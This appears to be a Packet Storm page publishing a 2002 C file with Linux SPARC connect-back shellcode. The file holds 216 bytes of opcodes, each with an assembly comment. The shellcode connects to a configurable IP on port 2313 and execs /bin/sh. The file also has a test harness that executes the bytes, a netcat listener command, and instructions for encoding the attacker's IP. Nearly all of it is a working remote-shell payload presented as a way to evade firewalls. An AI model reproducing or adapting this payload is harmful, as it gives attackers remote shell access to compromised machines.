Linux sparc connect back shellcode. 216 bytes, sends a shell to a specified IP on port 2313. Includes a small c program which encodes an IP address into the shellcode.
4476cc4879f912cfde47de6359817f8123a4b3e6279c62e2d877d0d5b195b2c3/* linux (sparc) connect back shellcode, because someone had to evade those firewalls. *sigh* */
/*
* OS : Linux
* Architecture : Sparc
* Type : Connect Back
* Lenght : 216 Bytes
* Listen-Port : 2313/TCP
* Default IP : 192.168.100.1 ( see how you'll change it at the end. )
*
* null bytes (0x00), breaks (0x0a), nops, fork(), ... avoided.
* was tested accordingly, couldn't optimized more.
* plug it in your code, launch nc -l -vvv -p 2313 and wait for it.
*
* (c) 2002 killah @ hack . gr
* All rights reserved.
*
*/
#define NAME "Linux Sparc Connect-Back"
char cb_linux_sparc[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10" // ta 0x10
;
int main() // test me.
{
int (*test)();
test = (int (*)()) cb_linux_sparc;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(cb_linux_sparc));
(int)(*test)();
exit(0);
}
/*******************************************************************************
here it is the C code, that will give you the IPv4 Address of your
box, in a big-endianess style, so to replace it inside shellcode and
get the whole thing working for you.
example:
int main() { printf(" 0x%02x%02x%02x%02x\n",192,168,100,1); exit(0); }
or @ bash printf "0x%02x%02x%02x%02x\n" 192 168 100 1
i believe no further explanation needed.
********************************************************************************/
//EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed